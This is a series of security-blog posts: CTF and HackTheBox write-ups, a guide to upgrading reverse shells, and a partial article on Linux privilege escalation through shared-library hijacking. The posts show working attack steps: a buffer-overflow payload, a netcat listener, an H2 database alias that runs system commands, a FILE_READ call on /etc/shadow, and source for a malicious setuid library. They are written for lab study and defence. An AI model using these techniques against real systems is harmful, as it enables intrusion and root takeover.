We were given this ELF 64 executable.

A bit of reverse-engineering was helpful to understand the functionalities of this program.

The program asks the user to write a poem.
It asks a name for the author of the poem.
Then, it computes a score to the poem.
If we manage to score 1 000 000 points, the flag is won.

Observations:

We can score 100 points for each word of the following list inside our poem: [“ESPR”, “eat”, “sleep”, “pwn”, “repeat”, “CTF”, “capture”, “flag”].
The buffer allocated to the poem is too small for us to write “pwn” a thousand times.
Author and Poem fields are vulnerable to buffer overflows.

Solution

What we want is to overwrite the local variable storing the score of the poem. This will be done by overflowing from the author buffer.

NOTE: First, I wanted to overflow from the poem buffer directly. I managed to overwrite the score but it caused a segmentation fault so I supposed I had to do it from the author buffer.

Once again, we need to determine the overflow offset and the value we want to write in place of the poem’s score.

The value is pretty easy to determine. We want a score of a million which gives in hex:

gdb-peda$ p/x 1000000
$3 = 0xf4240

The offset can be found using the following technique:

Prepare a very long pattern to detect when the overflow occurs.
Set a breakpoint before the poem’s score is compared to 0xf4240.
From our previous reverse-engineering, we know that the poem’s score is stored at RBX+0x440.
Examine the value at RBX+0x440 after having submitted the big pattern with gdb.

$ python -c 'print "aaaa\nAAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEFFFFFFFFGGGGGGGGHHHHHHHIIIIIIII"' > payload
gdb-peda$ r < payload
gdb-peda$ x/d $rbx+0x440
0x6024e0 <poem+1088>:   5280832617179597229
gdb-peda$ x/x $rbx+0x440
0x6024e0 <poem+1088>:   0x49494949494949ad    # Score of our poem
gdb-peda$ p/x "I"
$5 = {0x49, 0x0}

We can see that the score is overwritten with “IIIIIII”.

NOTE: The \n is here to separate the poem and the author fields.

From there, we have everything needed to build our payload and to retrieve the flag.

[Junior CTF] Forensic - rare_mount

Little or big, we do not care!

FS

Difficulty estimate: Easy

All credit goes to $in who solved all of the forensic challenges alone and is the original author of the following writeups. :thumbsup:

An unknown file was all that was given for this challenge.

Running file on it was our first reflex but it didn’t gave much information:

kali:~/CTF/2018/35C3-Junior/For$ file rare-fs.bin
rare-fs.bin: data

binwalk, on the other hand, provided a way more intersting output:

kali:~/CTF/2018/35C3-Junior/For$ binwalk rare-fs.bin

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JFFS2 filesystem, big endian

After some research, we found jefferson which is a JFFS2 filesystem extraction tool.

kali:~/CTF/2018/35C3-Junior/For/files$ jefferson rare-fs.bin -d rare_mount.out
dumping fs #1 to /home/boiteaclou/CTF/2018/35C3-Junior/For/files/rare_mount.out/fs_1
Jffs2_raw_dirent count: 2
Jffs2_raw_inode count: 2155
Jffs2_raw_summary count: 0
Jffs2_raw_xattr count: 0
Jffs2_raw_xref count: 0
Endianness: Big
writing S_ISREG RickRoll_D-oHg5SJYRHA0.mkv
writing S_ISREG flag
----------

The tool extracted a RickRoll video as long as the flag!

kali:~/CTF/2018/35C3-Junior/For/files/rare_mount.out/fs_1$ cat flag
35C3_big_or_little_1_dont_give_a_shizzle

[Junior CTF] Forensic - epic_mount

A little bit of stego. Not every header field looks like the other.

FS

Difficulty estimate: Easy-Medium

This second file was also in JFFS2 format.

Jefferson won’t do all the job this time! It returns the following error: hdr_crc does not match!.

Digging into the code of jefferson, we found the part responsible of this error:

if mtd_crc(data[:self.size - 8]) == self.node_crc:
            self.node_crc_match = True
else:
    print 'hdr_crc does not match!'
    self.node_crc_match = False

Header CRCs seem to be broken so we added the following two lines to the else clause:

print 'now : ' + hex(self.node_crc)
print 'should be : ' + hex(mtd_crc(data[:self.size - 8]))

That way, we could manually fix the broken CRCs using an Hex editor. It looked good on the paper but it didn’t gave us the flag…

Then, we remembered the challenge statement evocating some stego and we decided to dump the headers for which the CRC was wrong. We did this by adding the following print statement to jefferson’s code:

print data[:self.size-30]

From this dump, we can reconstruct the flag by extracting one byte of each line:

kali:~/CTF/2018/35C3-Junior/For$ cat dump_chall2.txt
D-0o3\\\
-5\\\@
D-0C\\\p
D-0o
    3\\\
D-0o_\\\P
D-0o'h\\\P
D-0o+i\\\
Bd\\\L
D-0ove\\\
D-0o_\\\
D-0om\\\
D-0oe\\\
D-0o_\\\        @
D-0ob\\\        p
D-0oa\\\

D-0ob\\\

D-0oy\\\

D-0o_\\\
D-0o\\\
D-0on\\\@
D-0oMe\\\
D-0oN_\\\
D-0o:m\\\P
@@vCo\\\Q@
;.\r\\\U0
D-0oe\\\U
D-0o_\\\X
jUt\\\Zp
D-0oi\\\\0
-Cm\\\]
@@ie\\\

Flag: 35C3_hide_me_baby_one_more_time

[Junior CTF] Forensic - legendary_mount

Something’s horribly broken. :(

FS

Difficulty estimate: Medium

Running jefferson doesn’t reveal anything apart from the same troll video as for the two previous challenges. The challenge statement suggests that something is corrupted so followed this track.

strings shows a few interesting strings like “ROFL”, “rofl” and “/secret/flag” so we decided to examine this file with an hex editor.

This resource was very helpful for understanding the file structure.

Using the hex editor, we can see a corrupted file located at the end. With the same technique we used during epic_mount for printing the corrupted bytes, we managed to fix several hdr_crc, node_crc, data_crc and a zlib header.

The following two screen captures show the before/after with all of our corrections.

BEFORE:

AFTER:

Then, we ran jefferson which gave us a file containing the flag!

Flag 35C3_mama_what_happend_to_my_honda_CR-C

Congratulations again to $in for theses forensic challenges!

BoiteAKlou :hammer:

Upgrading to a fully interactive reverse shell

2018-12-27T09:00:00+00:00

Let’s say you’re in the middle of a hacking challenge or pentesting assessment and you finally manage to get a reverse shell on your target. This short article will explain you how to obtain a fully interactive version of your reverse shell, that will allow commands like su, vi, nano, ssh, etc… but also CTRL+C and tab completion.

Spawning a PTY
Resizing and tab completion
Adding some color

Spawning a PTY

It doesn’t matter which way you got your initial reverse shell, it should approximately look like this:

LAB-Blog:~$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 40610
id
uid=1001(www-data) gid=1001(www-data) groups=1001(www-data)

A lot of Unix commands require to be executed from a terminal. But, the classical netcat reverse shell you obtain at first has no TTY associated. If you wish to know a bit more about the internal working of TTYs, I recommend you this great article The TTY demystified from Linus Akesson.

In order to overcome this difficulty, we will use python PTY module and especially the spawn function:

pty.spawn(argv[, master_read[, stdin_read]])

Spawn a process, and connect its controlling terminal with the current process’s standard io. This is often used to >baffle programs which insist on reading from the controlling terminal.

Python is one of the best option because it is almost always installed on the target machine. If by any chance it’s not the case, you can still try python3.

The command to execute is the following:

$ python -c 'import pty; pty.spawn("/bin/bash");'

It should give the following output:

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@TARGET:~$

Now you can use commands that require to be executed from a terminal.

Resizing and tab completion

If by mistake, you run an endless command and hit CTRL+C, your reverse shell will disappear as well as your joie de vivre. Also, you could see the output of the ps command truncated because the size of the reverse shell on the remote machine doesn’t suit the size of your host terminal.

These two issues can be solved following this procedure:

Background your reverse shell with CTRL+Z.
Print the size of your host terminal: stty -a |cut -d';' -f2-3 | head -n1.
Transfer local hotkeys to the remote shell: stty raw -echo.

If you’re using zsh or another custom shell different from bash, this command may not work properly.

Bring the reverse shell back to foreground: fg. You may need to hit ENTER after this command.
Inside the remote shell, adjust the size: stty rows <ROWS> cols <COLS>.

You should now have an interactive reverse shell with tab completion, signals handling, no truncated outputs.

Adding some color

Now the icing on the cake, let’s add some color!

Simply echo the value of $TERM environment variable in your local terminal and set it to the same value in the remote shell:

LAB-Blog:~$ echo $TERM
xterm-256color

www-data@TARGET:~$ export TERM=xterm-256color

You need to reset the shell in order for the changes to take place.

You should now feel at home inside your reverse shell! :smile:

BoiteAKlou :hammer:

HackTheBox: Hawk writeup

2018-12-01T21:00:00+00:00

Hawk has been retired from HackTheBox active machines so here is my writeup explaining how I rooted this machine.

In this article, we will crack a salted OpenSSL encrypted file, upload a reverse shell to an instance of Drupal 7 CMS. Then, we will use a SSH port-forwarding trick to access a H2 database console disallowing remote connections and exploit this app to get root on the machine. Enjoy your reading!

Initial Foothold And User Access
Elevating privileges

Initial Foothold And User Access

Recon

As with every machine, we only know its IP address so we have to start with the reconnaissance phase. nmap is always a weapon of choice for this.

Let’s start with a basic scan using default scripts (-sC option). We will run a deeper scan if nothing is found.

$ nmap -sC -sV -vvv -oA nmap/Hawk 10.10.10.102
[...]
PORT     STATE SERVICE REASON  VERSION
21/tcp   open  ftp     syn-ack vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.14.20
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e4:0c:cb:c5:a5:91:78:ea:54:96:af:4d:03:e4:fc:88 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDBj1TNZ7AO3WSpSMz0UoHlGmWQRlvXcyMXMRhDJ8X+9kZZGKkdXxWcDAu/OvUXdwCKVY+YjPPY8wi+jqKIQXlgICA3MEcg3RlLoHPTUh6KFmPxlT7Heaca7xSJ+BnhFxYF+bhhiaHgcaK8qlZFc9qS2Un3oNS6VDAAHOx2p4FU8OVM/yuik9qt6nxAQVS/v3mZfpVUm3HKOOcfXzyZEZAwrAWHk+2Y2yCBUUY1AmCMed566BfmeEOYXJU18I92fsSOhuzTt7tqX4u66SO1cyLTJczSA7gF42K8O+VPyn3pWnLmMBnAcZS0KbMUKVPa3UBSScxl5nLlSFRyJ1rCBxs7
|   256 95:cb:f8:c7:35:5e:af:a9:44:8b:17:59:4d:db:5a:df (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM0hCdwqpZ6zvQpLiZ5/tsUDQeVMEXicRx6H8AOW8lyzsHJrrQWgqM1vo5jKUn+bMazqzZ1SbP8QJ3JDS2/SlHs=
|   256 4a:0b:2e:f7:1d:99:bc:c7:d3:0b:91:53:b9:3b:e2:79 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF3kNN27mM1080x8c4aOWptSRg6yN21uBMSQiKk1PrsP
80/tcp   open  http    syn-ack Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 36 disallowed entries
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
| /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php
| /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/
| /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/
| /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/
|_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome to 192.168.56.103 | 192.168.56.103
8082/tcp open  http    syn-ack H2 database http console
|_http-favicon: Unknown favicon MD5: 8EAA69F8468C7E0D3DFEF67D5944FF4D
| http-methods:
|_  Supported Methods: GET POST
|_http-title: H2 Console
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Very interesting results! We have an FTP server allowing anonymous login, an SSH server, an Apache web server running Drupal 7 CMS and a H2 database console. Let’s dig into all of this!

We can connect to the ftp server using the name anonymous without password. While exploring the only available directory, we have found a hidden file named .drupal.txt.enc, that we have downloaded.

$ ftp 10.10.10.102
Connected to 10.10.10.102.
220 (vsFTPd 3.0.3)
Name (10.10.10.102:boiteaklou): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    3 ftp      ftp          4096 Jun 16 22:14 .
drwxr-xr-x    3 ftp      ftp          4096 Jun 16 22:14 ..
drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 messages
226 Directory send OK.
ftp> cd messages
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Jun 16 22:21 .
drwxr-xr-x    3 ftp      ftp          4096 Jun 16 22:14 ..
-rw-r--r--    1 ftp      ftp           240 Jun 16 22:21 .drupal.txt.enc
226 Directory send OK.
ftp> get .drupal.txt.enc
local: .drupal.txt.enc remote: .drupal.txt.enc
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for .drupal.txt.enc (240 bytes).
226 Transfer complete.
240 bytes received in 0.00 secs (2.3842 MB/s)

Salted OpenSSL Decryption

As its suffix suggests it, this file is encrypted. We can verify that using the file program.

$ file .drupal.txt.enc
.drupal.txt.enc: openssl enc'd data with salted password, base64 encoded

It is also base64 encoded so we decode it using the following command:

$ cat .drupal.txt.enc | base64 -d > drupal.txt.enc

After a bit of research, I found a tool on github called bruteforce-salted-openssl which revealed itself very effective. I used it with the classical rockyou.txt wordlist:

$ bruteforce-salted-openssl -t 8 -f rockyou.txt -v 30 -d SHA256 drupal.txt.enc
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 29
Tried passwords per second: inf
Last tried password: 1234567890

Password candidate: friends

Perfect! We have the password. We can now use OpenSSL to decipher the file:

$ openssl enc -d -aes-256-cbc -pass pass:friends -in drupal.txt.enc
Daniel,

Following the password for the portal:

PencilKeyboardScanner123

Please let us know when the portal is ready.

Kind Regards,

IT department

It looks like we’ve found credentials for a certain portal.

Drupal Reverse Shell Upload

Drupal is an Open-Source Content Management System.

Browsing to http://10.10.10.102:80, we are facing a login page.

Trying a couple common usernames, we quickly found out that “admin” was the right one to combine with the password we just deciphered.

Once logged in, all we have to do is to enable phpfilters and to create a new article with our php reverse shell payload inside. I’ll detail all these steps right below.

First of all, we have to setup a local listener for our reverse shell:

$ nc -lvnp 9999
listening on [any] 9999 ...

Now, we have to enable phpfilters in order to be able to execute PHP code inside articles. Once logged in as admin, go to Configuration > Content Authoring > Text formats and tick “PHP Evaluator”.

Then, we can add a new article and place our PHP reverse shell payload inside.

Also, don’t forget to set the text format of the article to “PHP Code” at the bottom the page:

The reverse shell should be coming back to our machine now:

$ nc -lvnp 9999
listening on [any] 9999 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.102] 38992
/bin/sh: 0: can t access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Very nice! Being connected as www-data is not enough for the user flag unfortunately. We must find a way to connect as a real user!

Stored credentials retrieval

First, let’s upgrade this horrible shell to a bash:

$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@hawk:/var/www/html$

After a bit of digging, I found what seems to be a plaintext password:

www-data@hawk:/var/www/html$ grep -Ri password
[...]
sites/default/settings.php:      'password' => 'drupal4hawk',
[...]

Having a look at /home/, we can see that daniel is our potential target. Let’s see if we can su as daniel with this password:

www-data@hawk:/var/www/html$ su daniel
su daniel
Password: drupal4hawk

Python 3.6.5 (default, Apr  1 2018, 05:46:30)
[GCC 7.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>>

It’s working but we’re popping inside a python shell! Surprising, even though it shouldn’t be too difficult to escape.

Python Shell Escape

Actually, we can use the same technique we used to upgrade from /bin/sh to /bin/bash:

Python 3.6.5 (default, Apr  1 2018, 05:46:30)
[GCC 7.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pty
import pty
>>> pty.spawn('/bin/bash')
pty.spawn('/bin/bash')
daniel@hawk:/var/www/html$

Nothing prevents us to get the user flag anymore!

daniel@hawk:/var/www/html$ cat /home/daniel/user.txt
cat /home/daniel/user.txt
[REDACTED]

As we’ve seen during our recon, an SSH server is running and we can use to directly login as daniel. A nice checkpoint allowed by the author of the box :wink:.

Elevating privileges

We are now connected as daniel via SSH. We can start the enumeration process.

Enumeration

When looking for a way to escalate privileges on machine, I like to run a tool like LinEnum.sh in the background while I fuzz the machine manually.

Do you remember the H2 Database console we saw with the nmap scan? It is running as root on Hawk…

daniel@hawk:~$ ps -aux |grep h2
root        801  0.0  0.0   4628   808 ?        Ss   Nov30   0:00 /bin/sh -c /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
root        802  0.0  5.7 2345696 56448 ?       Sl   Nov30   1:28 /usr/bin/java -jar /opt/h2/bin/h2-1.4.196.jar
daniel    21347  0.0  0.1  13136  1012 pts/2    S+   18:57   0:00 grep h2

Are you thinking what I am thinking?

When trying to access it in a web browser, it says: “Sorry, remote connections (‘webAllowOthers’) are disabled on this server.” :cry:

SSH Port Forwarding

Now that we have a foot in the system, we can initiate connections from the machine itself. Let’s verify this:

daniel@hawk:~$ curl http://127.0.0.1:8082
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--
Copyright 2004-2014 H2 Group. Multiple-Licensed under the MPL 2.0,
and the EPL 1.0 (http://h2database.com/html/license.html).
Initial Developer: H2 Group
-->
<html><head>
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
    <title>H2 Console</title>
    <link rel="stylesheet" type="text/css" href="stylesheet.css" />
<script type="text/javascript">
location.href = 'login.jsp?jsessionid=c48d2804eb930787aff2325b9aba37dd';
</script>
</head>
<body style="margin: 20px;">

<h1>Welcome to H2</h1>
<h2>No Javascript</h2>
If you are not automatically redirected to the login page, then
Javascript is currently disabled or your browser does not support Javascript.
For this application to work, Javascript is essential.
Please enable Javascript now, or use another web browser that supports it.

</body></html>

Seems allowed when executed from the localhost! However, we don’t have access to a web browser on Hawk. This is why we need to use SSH port forwarding as follows: ssh -L 9000:localhost:8082 [email protected]

The english version is: “Forward everything I send to port 127.0.0.1:9000 to 10.10.102:8082”.

Now, we should be able to access the H2 database console from our own web browser.

H2 Database Console

When trying to connect to the default database with default credentials, it returns an error. But what if we try to connect to a new database?

I changed the database URL to a non-existing database and the connection test returns “Success”. Now, I can connect to this new database. From there, I can execute H2 functions like FILE_READ('/etc/shadow',NULL) for instance.

Replace /etc/shadow by /root/root.txt and you’ll get the root flag! :checkered_flag:

Ok we can read protected files, but can we get a root shell?

Getting a Root Shell

Still connected to our boiteaklou database, we can create an alias with the following command:

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A"); return s.hasNext() ? s.next() : "";  }$$;

Then, we can trigger the code execution by calling this alias and specifying our command as an argument:

It’s kind of a root shell! If you want something more interactive, it can be done easily from what we have and I’m sure you will find a way :wink:

I hope you enjoyed this writeup and see you next time guys!

BoiteAKlou :hammer:

Linux Privilege Escalation: Abusing shared libraries

2018-11-21T12:00:00+00:00

Linux applications often use dynamically linked shared object libraries. These libraries allow code flexibility but they have their drawbacks… In this article, we will study the weaknesses of shared libraries and how to exploit them in many different ways. Each exploit will be illustrated by a concrete example, which should make you understand how to reproduce it. I’ll give recommendations on how to protect your system against it in the final part of the article.

Shared Libraries in short
Dynamic Linking in Linux
Find a vulnerable application
But can we exploit it?
How can we defend against this?

Disclaimer

I won’t describe here the full details of how libraries work in Linux, my goal is to give you the necessary amount of information so you can understand the exploit and be able to reproduce it.

Shared Libraries in short

A library is a file containing data or compiled code that is used by developers to avoid re-writing the same pieces of code you use in multiple programs (modular programming). It can contain classes, methods or data structures and will be linked to the program that will use it at the compilation time.

There are different types of libraries in Linux:

Static libraries (.a extension)
Dynamically linked shared object libraries (.so extension)

Static libraries will become part of the application so they will be unalterable once the compilation done. Every running program has its own copy of the library, which won’t be interesting for us.

Dynamic libraries can be used in two ways:

Dynamic linking (dynamically linked at run time).
Dynamic loading (dynamiclly loaded and user under program control).

They seem much more attractive because of their dynamic nature. If we manage to alter the content of a dynamic library, we should be able to control the execution of the calling program and that’s what we want!

For that reason, we will focus on dynamic linking in this article.

Dynamic Linking in Linux

Since these libraries are dynamically linked to the program, we have to specify their location so the Operating System will know where to look for when the program is executed.

ld is the GNU linker. Its man page gives us the following methods for specifying the location of dynamic libraries:

Using -rpath or -rpath-link options when compiling the application.
Using the environment variable LD_RUN_PATH.
Using the environment variable LD_LIBRARY_PATH.
Using the value of DT_RUNPATH or DT_PATH, set with -rpath option.
Putting libraries in default /lib and /usr/lib directories.
Specifying a directory containing our libraries in /etc/ld.so.conf.

As an attacker, our objective is to control one of these methods in order to replace an existing dynamic library by a malicious one. By default, security measures have been put in place in Linux. However, we will see that there are so many ways to make this exploit possible…

Find a vulnerable application

Since we want to escalate privileges, it is mandatory to find an executable file with setuid bit enable. This bit allows anyone to execute the program with the same permissions as the file’s owner.

We can find those files using the following command:

$ find / -type f -perm -u=s 2>/dev/null | xargs ls -l

We combine it to ls -l so we can check that the file’s owner is root.

LAB-Blog:~/Abusing-Shared-Libraries$ find / -type f -perm -u=s 2>/dev/null | xargs ls -l
-rwsr-xr-x 1 root   root        30112 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root   root        34812 May 16  2018 /bin/mount
-rwsr-xr-x 1 root   root       157424 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root   root        38932 May  7  2014 /bin/ping
-rwsr-xr-x 1 root   root        43316 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root   root        38900 May 17  2017 /bin/su
-rwsr-xr-x 1 root   root        26492 May 16  2018 /bin/umount
-rwsr-sr-x 1 root   root          387 Jan 15  2018 /sbin/ldconfig
-rwsr-sr-x 1 root   root       831936 Jan 15  2018 /sbin/ldconfig.real
-rwsr-sr-x 1 daemon daemon      50748 Jan 14  2016 /usr/bin/at
-rwsr-xr-x 1 root   root        48264 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root   root        39560 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root   root        78012 May 17  2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root   root         7376 Nov 18 22:03 /usr/bin/myexec      # Hmm... suspicious
-rwsr-xr-x 1 root   root        36288 May 17  2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root   root        34680 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root   root        36288 May 17  2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root   root        53128 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root   root        18216 Jul 13 15:47 /usr/bin/pkexec
-rwsr-xr-x 1 root   root       159852 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-- 1 root   messagebus  46436 Jan 12  2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root   root         5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root   root        42396 Jun 14  2017 /usr/lib/i386-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root   root       513528 Jan 18  2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root   root        13960 Jul 13 15:47 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 root   root       105004 Jul 19 13:22 /usr/lib/snapd/snap-confine

The file /usr/bin/myexec has the setuid bit enabled and is owned by root. (By the way, this specific program caught our attention because it’s the only unknown program of the list. If you have any doubt on an application, google should help you find out if it’s a regular linux application or not.)

Is there any chance that /usr/bin/myexec uses shared objects? Let’s check this with ldd:

LAB-Blog:~/Abusing-Shared-Libraries$ ldd /usr/bin/myexec
	linux-gate.so.1 =>  (0xb779b000)
	libcustom.so => /usr/lib/libcustom.so (0xb778e000)   # Looks like a custom library
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75d8000)
	/lib/ld-linux.so.2 (0xb779c000)

We can see libcustom.so, which looks pretty custom (Oh really?). This executable file gathers all the pre-requisites. However, we still need to find a way to inject our malicious dynamic library.

But can we exploit it?

As always when it comes to privilege escalation, everything starts from a misconfiguration. From the moment we find a setuid file using shared objects, there are at least 4 possible misconfigurations that could lead to privilege escalation. I’ll detail here the three working exploits that I’ve already seen on a machine. To those detailed below, you can add the RPATH technique, which is very similar to the second method I present: LD_PRELOAD and LD_LIBRARY_PATH.

For the need of the examples you’ll find below, I’ve created the setuid ELF executable myexec linked with the dynamic library libcustom.so.

# myexec.c

#include <stdio.h>
#include "libcustom.h"

int main(){
    printf("Welcome to my amazing application!\n");
    say_hi();
    return 0;
}

# libcustom.c

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void say_hi(){
    printf("Hello buddy!\n\n");
}

But also an evil library that we will try to inject in place of the real libcustom.so:

# evil libcustom.c

#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>

void say_hi(){
    setuid(0);
    setgid(0);
    printf("I'm the bad library\n");
}

This one is only printing a different output but be sure that if we manage to execute this code, we could obviously pop a shell with system("/bin/sh",NULL,NULL);.

Now let’s see which configuration mistakes we could exploit…

1. Write permissions on /lib or /usr/lib

Even though this one seems pretty unlikely, it could happen that a user has write permissions on one these folders. In that case, the attacker could easily craft a malicious libcustom library and place it into /lib or /usr/lib. Of course, he would have deleted the original library first.

When executing /usr/bin/myexec, the malicious library will be called instead.

2. LD_PRELOAD and LD_LIBRARY_PATH

I decided to present this technique as it’s a must-known, even though it won’t work in our case :laughing:. Let me explain why.

LD_LIBRARY_PATH and LD_PRELOAD are environment variables. The first one allows you to indicate an additionnal directory to search for libraries and the second specifies a library which will be loaded prior to any other library when the program gets executed.

These variables modify the environment of the current user, but when you execute a setuid program, it is done in the context of the owner, which hasn’t necessarily set LD_LIBRARY_PATH or LD_PRELOAD. Let me show you an example.

I’ve created 2 executables: 1 with setuid bit enabled and 1 without.

LAB-Blog:~/Abusing-Shared-Libraries$ ls -l /usr/bin/myexec*
-rwsr-sr-x 1 root root 7376 Nov 18 22:03 /usr/bin/myexec	# Setuid
-rwxr-xr-x 1 root root 7376 Nov 19 20:18 /usr/bin/myexec2

LD_PRELOAD

Using the LD_PRELOAD technique with the evil library on myexec2 (without setuid bit), we have the following output:

LAB-Blog:~/Abusing-Shared-Libraries$ LD_PRELOAD=/tmp/evil/libcustom.so /usr/bin/myexec2
Welcome to my amazing application!
I'm the bad library

With the same technique on myexec:

LAB-Blog:~/Abusing-Shared-Libraries$ LD_PRELOAD=/tmp/evil/libcustom.so /usr/bin/myexec
Welcome to my amazing application!
Hello buddy!

We can see that it’s working when the setuid bit isn’t enabled for the reasons explained above.

LD_LIBRARY_PATH

Let’s check the behavior of myexec and myexec2 when using LD_LIBRARY_PATH:

LAB-Blog:/tmp$ export LD_LIBRARY_PATH=/tmp/evil/
LAB-Blog:/tmp$ ldd /usr/bin/myexec
	linux-gate.so.1 =>  (0xb770f000)
	libcustom.so => /tmp/evil/libcustom.so (0xb7708000)			# !!!
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb754c000)
	/lib/ld-linux.so.2 (0xb7710000)
LAB-Blog:/tmp$ ldd /usr/bin/myexec2
	linux-gate.so.1 =>  (0xb77a1000)
	libcustom.so => /tmp/evil/libcustom.so (0xb779a000)			# !!!
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb75de000)
	/lib/ld-linux.so.2 (0xb77a2000)

You can see that the libcustom.so linked with these two programs is the evil one. However, when we run them, we have the following output:

LAB-Blog:/tmp$ /usr/bin/myexec
Welcome to my amazing application!
Hello buddy!

LAB-Blog:/tmp$ /usr/bin/myexec2
Welcome to my amazing application!
I'm the bad library

Certain security measures have been put in place to avoid this kind of exploits but there was a time where it was possible and I think this is a pretty interesting mechanism to understand.

3. Setuid bit on ldconfig

ldconfig is used to create, udpate and remove symbolic links for the current shared libraries based on the lib directories present in /etc/ld.so.conf. This application has no setuid bit enabled by default but if an unconscious administrator sets it, he is exposing himself to some serious issues.

/etc/ld.so.conf is a configuration file pointing to other configuration files that will help the linker to locate libraries.

LAB-Blog:~$ cat /etc/ld.so.conf
include /etc/ld.so.conf.d/*.conf

Inside /etc/ld.so.conf.d/, you can have several files with each of them specifying a directory to explore when searching for libraries. For example, libc.conf contains the following:

LAB-Blog:/etc/ld.so.conf.d$ cat libc.conf
# libc default configuration
/usr/local/lib

If a hazardous administrator creates a configuration file, which adds a world-writable directory (i.e. /tmp) to the group of directories being checked by the linker, an attacker could place its malicious library here.

It won’t be sufficient for our exploit though! We now need to use ldconfig to update the linker’s cache so that it will be aware of this new evil library. The cache can be updated with ldconfig without specifying any parameter. However, it has to be executed as root… This is where the setuid bit comes into play. Let me show you.

The configuration file from where everything starts:

LAB-Blog:~$ cat /etc/ld.so.conf.d/shouldnt_be_here.conf
/tmp

The evil library placed inside /tmp:

LAB-Blog:~$ ls -l /tmp/
total 12
-rwxrwxr-x 1 boiteaklou boiteaklou 7096 Nov 20 11:01 libcustom.so

ldd output BEFORE executing ldconfig:

LAB-Blog:~$ ldd /usr/bin/myexec
	linux-gate.so.1 =>  (0xb7759000)
	libcustom.so => /usr/lib/libcustom.so (0xb774c000)	# Pointing to the original library
	libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7596000)
	/lib/ld-linux.so.2 (0xb775a000)

ldd output AFTER executing ldconfig:

LAB-Blog:~$ ldconfig
LAB-Blog:~$ ldd /usr/bin/myexec
	linux-gate.so.1 =>  (0xb77c8000)
